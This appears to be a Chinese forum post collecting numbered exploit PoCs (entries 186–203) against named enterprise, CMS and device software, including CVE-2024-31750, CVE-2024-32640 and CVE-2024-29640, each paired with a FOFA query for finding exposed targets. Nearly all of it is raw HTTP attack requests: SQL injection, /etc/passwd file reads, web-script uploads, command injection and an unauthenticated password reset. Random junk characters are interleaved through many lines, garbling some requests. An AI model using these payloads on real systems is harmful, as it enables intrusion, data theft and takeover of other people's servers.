+ G$ d. p+ A) Z( ^7 z
# W8 y5 ]; ^/ u" W$ [
4 w( W7 x% x$ _8 @+ R% U0 @! r186. F-logic DataCube3 SQL注入
- ]& s, u7 g7 v; X' WCVE-2024-31750
* M, I: K. }3 p$ m6 ]& yF-logic DataCube3是一款用于光伏发电系统的紧凑型终端测量系统
+ k2 A& f* Y( B3 {FOFA:title=="DataCube3"
& H$ m, K" y6 ~( R4 ]POST /admin/pr_monitor/getting_index_data.php HTTP/1.17 `) |2 O- X! _# F1 ~2 r3 K( E
Host: your-ip
4 e6 R" W# R R4 w# W4 DUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0; x e3 P0 H) L8 C n7 p
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
& F* X. D( N1 e( J8 z6 n7 t% zAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2& R/ f! o6 }: b7 v
Accept-Encoding: gzip, deflate
7 ~; B3 D/ N- b7 JConnection: close
% h0 ~9 q: | g# ^1 JContent-Type: application/x-www-form-urlencoded
7 A) q. I4 J9 o+ H
9 L5 M+ J* N. e1 f& J6 kreq_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450, O" d6 g0 a, ^2 g
: D; }3 l' ?/ J! w
- v) `; j) k r9 ~: _187. Mura CMS processAsyncObject SQL注入
" ?& h8 L& W" A5 XCVE-2024-32640
% W# A1 U5 x F, q7 k* UFOFA:"Mura CMS"1 Q! N @6 z1 L1 k) d
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.19 w) f* j0 _: q0 @! |
Host: your-ip6 l! A5 Y8 j0 l) u7 ~8 @1 |
Content-Type: application/x-www-form-urlencoded
) t/ U+ A: ^% _% E
( r2 J8 }/ |0 Q
5 z1 Z3 ]: L: j1 T$ r2 H9 Jobject=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1
# I3 X6 T- ^9 c: h% D: G3 a7 X4 e; Z3 l2 ^- S( R6 m
4 T9 s* K) x: C' k
188. 叁体-佳会视频会议 attachment 任意文件读取
$ i& U, ^$ t8 D5 w% Lversion <= 3.9.7
1 q! a f7 T2 [" h" _9 q8 ~# GFOFA:body="/system/get_rtc_user_defined_info?site_id"
8 ~2 _+ K, B# l6 [GET /attachment?file=/etc/passwd HTTP/1.1
& e: c/ K! [5 W+ uHost: your-ip+ W* ^- |4 r2 y! p
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36: r/ j$ q9 h% D" Y% j J
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
- ]: k6 t; y; [Accept-Encoding: gzip, deflate( e8 @& x. c7 n9 o' k
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
* _1 m- K2 m Q: z' h+ VConnection: close
3 P& o( Q% [+ F) Y2 ]' C3 p7 Z5 ]. ^/ D
9 ]8 k$ W, U* l, X: G, x
189. 蓝网科技临床浏览系统 deleteStudy SQL注入
# r3 [+ U1 v2 t9 y/ ~) ~4 f- R! hFOFA:app="LANWON-临床浏览系统"+ {1 X2 d1 S% v! h9 ~( R5 W; [# k- _/ n
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
/ Z2 O' m6 |1 z- ^7 @Host: your-ip
, J0 C3 e8 Q) U: y' U. RUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36, m: n) G& `) b8 n8 {
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.76 t, @ _1 i$ w$ e1 [: |# ~8 k: n
Accept-Encoding: gzip, deflate
' [+ W; o* n& m& A9 U6 ?7 u, q7 RAccept-Language: zh-CN,zh;q=0.9* {0 n" _. h2 j4 L
Connection: close
% z5 m. R$ P, ~ `% y3 n; u. R! B# g' a1 V9 B1 k
$ }- K7 B7 r' z: m190. 短视频矩阵营销系统 poihuoqu 任意文件读取" L. Q) c1 B$ ]+ }
FOFA:title=="短视频矩阵营销系统"8 A8 C9 T( w% g: k# h, s. t
POST /index.php/admin/Userinfo/poihuoqu HTTP/2
4 p; i+ U) L+ m: X+ dHost: your-ip
! V+ v4 E7 F; g% D' o- m- c& HUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
0 t0 m* P, ]0 l$ R" {+ t- zAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9; C, J3 B9 Y" T# X) L5 q
Content-Type: application/x-www-form-urlencoded7 t) b, W8 ?4 `9 c# D- E
Accept-Encoding: gzip, deflate
" L; t8 i& k5 T) {Accept-Language: zh-CN,zh;q=0.9
8 B" e- I9 @0 d! c) Y' [- u5 Z8 v# f' K4 B1 K0 H+ L$ h/ t1 T
poi=file:///etc/passwd6 T/ \: `4 q9 v( U0 T. x' R9 a6 ?
4 p8 e$ c* z9 I! q" i" _" X: ^
0 w2 Q1 O, [$ _4 f6 B191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入* S( W$ G) p' g
FOFA:body="/CDGServer3/index.jsp"
4 w7 j3 n w4 B. h+ yPOST /CDGServer3/js/../NavigationAjax HTTP/1.1
$ ?/ m* u# o1 r: n2 c3 O$ d. xHost: your-ip
3 x" e6 x$ b' U/ E# k! bUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
) {% ]8 c$ p7 mContent-Type: application/x-www-form-urlencoded
" g0 j+ y3 X; x! C8 R9 r `" j2 N# p( r
command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=
" U5 [6 A. V: v& H
f3 ^/ h& s- [) K( z+ c" K1 c1 s$ I0 {. r) d5 j2 a( G
192. 富通天下外贸ERP UploadEmailAttr 任意文件上传: h7 s3 w4 ?, b0 d
FOFA:title="用户登录_富通天下外贸ERP"
/ k+ L* \( C, U* t# G5 BPOST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1& \# w+ k& V/ {
Host: your-ip% B' d: U7 g! e3 `5 {0 W
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
0 ^1 R* y. O( q- J' G0 |Content-Type: application/x-www-form-urlencoded. s3 F0 t4 s8 p l, }2 V ]: g
; a& I6 ~6 a7 U; h4 t! @
/ `: D0 o ? {% ]% g( {
<% @ webhandler language="C#" class="AverageHandler" %>
7 ~1 O7 }& b7 R0 O5 A0 A a- L w. tusing System;
2 R. a$ B( W( d8 g& O w% Musing System.Web;
& G' P. w. C9 k! A0 Q- lpublic class AverageHandler : IHttpHandler1 R3 j+ q$ }3 H; R& M: d6 K
{2 o# g/ y, \ C6 N3 Q. `/ y
public bool IsReusable& H. X! k1 `; f& X1 U( a9 h' i6 V9 W3 z
{ get { return true; } }
! t7 t: E4 U$ l. b' k% Y9 opublic void ProcessRequest(HttpContext ctx)
# s# b8 Z; G, q, @+ c. S* Y0 }{
7 W E8 {5 v3 z/ Z" Cctx.Response.Write("test");
- H& ~ u$ G( I# k9 t% g+ N}: P) K% ?8 q h% p
}/ d7 d& a- y4 q8 B8 U+ o
6 t; a6 j9 L. Z4 d! c7 y
+ q( j6 {6 i" K# j, ^ S193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行; h N/ Y$ u! x4 ~* C9 I# x: |* N
FOFA:body="山石云鉴主机安全管理系统"+ j {& v) n0 r
GET /master/ajaxActions/getTokenAction.php HTTP/1.1/ o' B" ~+ R3 a9 c
Host:+ Z1 d5 K6 q( W) r0 o1 q- ]
Cookie: PHPSESSID=2333333333333;2 e D9 Y( n4 R+ S; t! a8 X! K
Content-Type: application/x-www-form-urlencoded' ~ n5 B/ E; \1 X
User-Agent: Mozilla/5.0
% X) z$ M& N3 r0 y4 ?
# Z/ R O F+ m1 z" p, |6 f8 W7 `5 M$ n7 V/ J
POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.15 ]; Q0 B# D* j( U4 N- W; z
Host:
- E' o$ _3 O: tUser-Agent: Mozilla/5.0
) R# X4 d5 {) w+ o- C( u% T tAccept-Encoding: gzip, deflate# ]' `; _' B% p; G! Q2 [: f
Accept: */*
& l. A* S" `5 G+ G. q1 @ Y1 xConnection: close
7 y( O" _ k& @1 ICookie: PHPSESSID=2333333333333;# \# N$ w0 j5 \. Z; C3 f2 a
Content-Type: application/x-www-form-urlencoded! B, s" ]; S* y
Content-Length: 84
7 R5 i, h! T, b1 t v* n# l0 Y# w3 {+ R/ t1 x. a
param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')
* x( J U+ `; u% l- e, n$ k( h' `6 u, x8 u: |+ I$ R
9 b9 P Z8 C Z5 z2 x3 |GET /master/img/config HTTP/1.1# G. b* Q& o% f$ M% Y
Host:
" B! B) r0 k/ |* V# z% |User-Agent: Mozilla/5.0
/ w) @+ `/ ]$ Z0 c0 q* y! y% [% i) [
9 j2 s8 q3 w1 [+ k1 w: X+ A1 ^- |6 G& x% X0 F
194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传
7 ?1 m6 O2 j2 Q$ M' zFOFA:app="FE-协作平台"访问 /servlet/uploadAttachmentServlet 有返回则漏洞存在# M' G% B( s4 h" b
4 N7 ?0 x( ^' @5 l) @
POST /servlet/uploadAttachmentServlet HTTP/1.1, o% O; D6 H' o' m6 b
Host: host
" R/ y1 Q( `) M V1 _0 V7 k% k# cUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
6 w4 ?, G7 ~6 R U6 [& W+ V- WAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
/ y6 n2 P' x& ^Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2' q9 w( I9 t& B2 G& a {( y
Accept-Encoding: gzip, deflate: y) B# K' Q! D' O# s5 [% T6 s
Connection: close
% n, s% v" p% I$ n9 p8 a0 iContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk
2 y# c/ ^$ J6 y( a0 h3 B------WebKitFormBoundaryKNt0t4vBe8cX9rZk3 T X; W) F. B: \3 a- m U/ a7 M
2 @+ z: h1 M. b- z. b: _# u6 ~8 E: t/ R* [Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
3 M* E2 E; l1 U h% ]! L3 m4 PContent-Type: text/plain- K1 s$ m' j4 \! p3 n
<% out.println("hello");%>/ P, Z0 c$ N' a7 [+ S- V
------WebKitFormBoundaryKNt0t4vBe8cX9rZk, Y' ?6 X p7 K6 L
Content-Disposition: form-data; name="json"+ t1 b3 u* A: ?- n* r
{"iq":{"query":{"UpdateType":"mail"}}}' T& w6 o1 p7 N
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--
) p0 O2 K' Q" H1 [2 c. o2 d \2 F" j. j
9 A4 q, {$ O9 ^) M
195. 飞鱼星上网行为管理系统 send_order.cgi命令执行5 D2 ?; E3 u4 Z5 l6 @/ B
FOFA:title=="飞鱼星企业级智能上网行为管理系统
/ K! }2 N1 i, z J5 `1 H/ gPOST /send_order.cgi?parameter=operation HTTP/1.1
" T K* K3 m' e2 qHost: 127.0.0.1
* j. Q0 b& s: aPragma: no-cache
, V/ m- g6 S3 ?0 H# A2 M% y3 t# |Cache-Control: no-cache, `7 n1 D% {: b0 Y$ ^3 j$ g
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
8 X1 _, Q7 `5 f1 T. P2 D3 P: {Accept: */*& m# Y/ b1 j8 ]/ z# j3 _8 |
Accept-Encoding: gzip, deflate6 {$ ^" Y* `* F
Accept-Language: zh-CN,zh;q=0.9
7 {( x# a( c: S4 M* W* M2 cConnection: close
$ c' s) x" C P) `4 \Content-Type: application/x-www-form-urlencoded
4 I6 m8 g) G- f3 FContent-Length: 68
; _* R, f: S8 g: M) b% d+ v9 _4 |* Z6 w! B- U
{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}& B( r2 F; _7 V& W' }( V
" D2 i# d6 X8 N$ q/ B
- i5 F- h( L* i) y196. 河南省风速科技统一认证平台密码重置) q; G# L' o, I4 l5 D" d* O3 t
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"& p# ?+ a+ v3 |) s p
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
* d6 P1 S1 b2 j' F% e5 V* d+ MUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.364 i3 H1 b$ ~+ d. {" B; y
Content-Type: application/json;charset=UTF-8
( x1 X, U/ N4 `# F' {X-Requested-With: XMLHttpRequest* n+ F2 X+ H" y+ @! q0 R/ Y2 \6 h
Host:
- x- c _! S, a$ A: WAccept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
3 g. @3 g9 o- V4 |$ N8 VContent-Length: 45. N$ x0 n2 n7 G3 ?
Connection: close
- q; x( C& Q4 g4 k0 d, b3 s' t$ x6 m! C; l
{"xgh":"test","newPass":"test666","email":""}
) Y7 H A) I0 \' m1 A7 [4 W7 Y1 p; M/ ]4 P( B
" r7 v) L2 c* u" ~$ ~4 r( g
; _9 m6 f9 j' z$ v. s5 s* _197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入4 G* ^( h% k- Q/ v" Q* C
FOFA:app="浙大恩特客户资源管理系统"
# \& ~* b; O" X4 LGET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1+ V7 u( c1 E3 Z+ X
Host:1 g7 {# ^1 m+ e5 J
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
6 v) \& C. P% [ NAccept-Encoding: gzip, deflate3 T, S3 B8 ^+ K0 f h& E4 V8 W8 D6 F
Connection: close* t! N! m' _9 ~5 Z6 W: K
9 V1 |' {" S7 g
# n+ `5 A- B7 F- p- g1 b! i {% v2 E* W/ `* k
198. 阿里云盘 WebDAV 命令注入
5 s7 D o7 S1 @8 FCVE-2024-29640
. _1 s, C, y7 V- ?3 nGET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1' I$ z; z( R6 s( @/ F
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64
- v% `5 h2 g9 q( {- `6 k1 Q/ |8 KAccept: */*3 \9 t4 V% H: q
Accept-Encoding: gzip, deflate
1 v' j; ]' k1 a" d0 W/ }: XAccept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6, z( x- p7 `$ [0 E
Connection: close
* Y b0 a) b4 j' i
+ i. S- V9 F, m E" S
, a% `( |& o- T2 L0 o5 N, f4 O" n199. cockpit系统assetsmanager_upload接口 文件上传5 V$ B( E0 h: ?% p4 X. d' |* T0 ^
+ Z1 m, R5 ?) d1 y$ k$ u% _$ x
1.执行poc进行csrf信息获取,并获取cookie,再上传访问得到结果:% o8 c7 Z& h) W7 C7 q/ J9 W! N2 ?
GET /auth/login?to=/ HTTP/1.1
. Y4 g5 c2 j1 T7 u! X5 K% `
' J( T F1 @& {0 f1 E响应:200,返回值:csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"6 t/ p! i# z; U; g, B" h" S
5 K/ P# W' } ~# X2.使用刚才上一步获取到的jwt获取cookie:
- ^8 b7 N& j- }( g& ~& |7 |) k+ G
( J" A& W) Z9 [* w- \POST /auth/check HTTP/1.1: J/ X# R4 f0 |, B2 y3 t6 t
Content-Type: application/json% A- t) D+ h/ l% @4 I
2 |4 J' T- v n h
{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}2 w) X; ^8 W! n8 I$ P6 F
6 r4 u* O- Q6 C+ Q# v: i7 B9 u8 N
响应:200,返回值:( P, f9 V4 l, B% t
Set-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/' @1 M) v, o7 y5 f6 D0 m
Fofa:title="Authenticate Please!"2 S9 R1 e: z' \. v/ l# \- ~5 L
POST /assetsmanager/upload HTTP/1.1
, n+ q% ]" R0 M9 d% SContent-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
* I6 R; t' Q8 b: j# J7 gCookie: mysession=95524f01e238bf51bb60d77ede3bea92
$ ?0 ~" t7 a3 f' N* c
9 A @4 F0 P8 i/ B* J- R-----------------------------36D28FBc36bd6feE7Fb33 o. K% C4 }2 d8 w. |) l$ F& o
Content-Disposition: form-data; name="files[]"; filename="tttt.php"
- l# s1 M- p" a: W0 qContent-Type: text/php
& j5 B) ^3 D- B9 h8 B0 G5 X9 n1 f, m0 Q i- k
<?php echo "tttt";unlink(__FILE__);?>$ c, |/ x5 k* p; H& J
-----------------------------36D28FBc36bd6feE7Fb31 H% [1 D( L) j' A& G, c( U5 v
Content-Disposition: form-data; name="folder"
8 W# w$ G* r+ ~6 e0 N/ O% S; h
! i" k6 S5 D) j- r-----------------------------36D28FBc36bd6feE7Fb3--
9 E- l9 A$ U/ f1 \" i k0 j+ s4 H; s! s+ f; Y8 u& ]7 H) ]
4 R+ \6 o L8 K( r- \8 {7 ]
/storage/uploads/tttt.php/ H* {! H1 U1 G9 _
) G i+ }' H! R6 |
200. SeaCMS海洋影视管理系统dmku SQL注入5 x" G0 U. T' n: c* l r) i
FOFA:app="海洋CMS" t) Q* }/ @& [5 I% i6 M, R) b
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1# p6 j( J5 s" y3 A
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
+ J) L8 j) H/ a7 Z) YUpgrade-Insecure-Requests: 14 J, w8 b% D; h+ ]# r1 h( K
Cache-Control: max-age=0
0 M: {& U6 x' h. |$ DAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7: t6 N1 P0 ~; X3 g7 T$ Q
Accept-Encoding: gzip, deflate( b* b2 a; i& b# Q& R
Accept-Language: zh-CN,zh;q=0.9
* p4 d5 p- @/ w! z" L+ ~, F
) ^; F) ^( A+ k0 |1 S3 A, V; y' s8 L r
201. 方正全媒体新闻采编系统 binary SQL注入/ K! R. K0 r/ d! A3 }$ }
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
5 h# S& i3 f6 ]POST /newsedit/newsplan/task/binary.do HTTP/1.15 ~$ D; P7 S3 n* s
Content-Type: application/x-www-form-urlencoded: s! q% @" z' C/ u: i$ t# \" z- m
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
8 n5 F- ^! [+ R. ^, @! c; EAccept-Encoding: gzip, deflate% h. @# v3 y6 \
Accept-Language: zh-CN,zh;q=0.9
4 G# K! L2 ~1 zConnection: close# K, o! h0 w2 a) G
% i. k* I0 w, e, ? D' ]: N
TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1
( O3 r# v. M/ a b2 y/ J g- g4 [% @5 A
, K% u' |9 E- e+ m& p5 s) y
: r X- X6 Z z202. 微擎系统 AccountEdit任意文件上传
! `2 c# F0 m2 _1 E( [0 xFOFA:body="/Widgets/WidgetCollection/"
+ p S: z& G" I0 n, S+ G获取__VIEWSTATE和__EVENTVALIDATION值/ z. h( l2 H1 Q
GET /User/AccountEdit.aspx HTTP/1.14 V4 U! o8 N) Q3 ?
Host: 滑板人之家
0 w6 g1 Y L" A9 QUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
" D& c2 R6 M7 k) g9 `: TContent-Length: 0
. n3 o1 l7 {% J/ @* F4 N8 u4 E: f6 t8 s
9 l5 k& E9 V8 p/ J% `2 [& @
替换__VIEWSTATE和__EVENTVALIDATION值0 _! Q2 `3 ~2 V9 x9 ` @5 b6 b
POST /User/AccountEdit.aspx HTTP/1.1/ w& Q3 J! s6 ^' ?1 w
Accept-Encoding: gzip, deflate, br& Y$ d) q) {2 f# g; C1 \# Y
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687
- J; B* k7 J& Z; X& E0 e$ A$ I9 C; P! K- F0 b
-----------------------------786435874t385875938657365873465673587356872 M# }, d* H+ R, J
Content-Disposition: form-data; name="__VIEWSTATE"
% w( ]7 A( U3 K
1 o9 G2 H. [5 u$ Y% ?5 X4 ___VIEWSTATE% f7 f) a- u1 N A* O7 p9 e8 O
-----------------------------786435874t38587593865736587346567358735687
; z7 {1 j/ j# [1 A5 e4 @Content-Disposition: form-data; name="__EVENTVALIDATION"
, L0 B& k# n8 f5 ^+ w! L6 Y* K5 `8 `/ h
__EVENTVALIDATION
7 A8 C0 I4 w5 R-----------------------------786435874t38587593865736587346567358735687
8 C& G" J% E" o6 U& z; S- `% ]' nContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"9 r, R9 j' l8 x" W* S8 n& g+ @
Content-Type: text/plain, _0 T! O! ^. O# M/ Q7 O0 X
$ x+ u& B% I4 k8 W! NHello World!) _( m% e* \3 H4 E) Q) Z) b
-----------------------------786435874t385875938657365873465673587356878 u, A! z7 l9 D8 R- z# C2 y
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"3 A6 `6 q! o+ d% N4 g" F
' N; Y* l* S6 |上传图片3 p- t) F2 l1 K5 [1 L" g
-----------------------------786435874t38587593865736587346567358735687. O0 R) g: J( ]7 a' N1 `1 F9 P
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"
q+ t( G: J4 h" E7 T3 \
* j! c$ v' \' M6 z) e6 ^ q9 {6 E& I' k3 f0 L: [6 i! C( H
-----------------------------786435874t385875938657365873465673587356876 R* Q6 [: @4 S* Z# n
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"
" ^, y; L2 {+ \8 a7 t! U: k( O$ _" F
* c) z% e/ f7 |7 k; R
-----------------------------786435874t38587593865736587346567358735687--; O) ]3 v5 K6 O$ o
0 `+ \ u# ?" Q! m; y
3 m9 C& t, j+ F; J4 u$ C4 n/_data/Uploads/1123.txt# a0 h. Y1 O/ `
* Q0 K0 [: P1 s4 \* n& Q
203. 红海云EHR PtFjk 文件上传3 n: r) m# e% y% O
FOFA:body="RedseaPlatform"' e a0 Y5 K+ L9 I1 _
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.15 P; s! v5 B# ]: I
Host: x.x.x.x# Q6 a; `) s/ c
Accept-Encoding: gzip
M+ Z, ~: I# V1 p* o, gUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
: I& z1 m1 N: V: fContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4; X* W) D8 G3 x% K
Content-Length: 210, t$ \ G' \) [
- m2 \( Q8 J$ H/ G
------WebKitFormBoundaryt7WbDl1tXogoZys4
" w) J3 ?" e, a- RContent-Disposition: form-data; name="fj_file"; filename="11.jsp"
) @% b5 ?! P# u: e* p( S" x5 JContent-Type:image/jpeg% z9 `9 m1 C% J0 O+ |
: N) l# s$ n+ P$ t
<% out.print("hello,eHR");%>
, |; b9 e+ E' ?5 `& k% u* I7 D& r------WebKitFormBoundaryt7WbDl1tXogoZys4--
- s# o8 j. j4 |1 E" ^- f& R% F( r3 a2 _$ f( S C& q
; _8 @( `2 I- K8 a' W
4 s3 ]- F& S4 [1 B3 l* O$ ?: Z. w/ }; P6 u8 g/ F1 o' _$ \
. u* a9 N: l" i+ T; b: p7 d: x! A0 _) q, f( i0 B; Q) {: b" S/ b
|
发表于 2024-6-5 14:31:29
收藏
支持
反对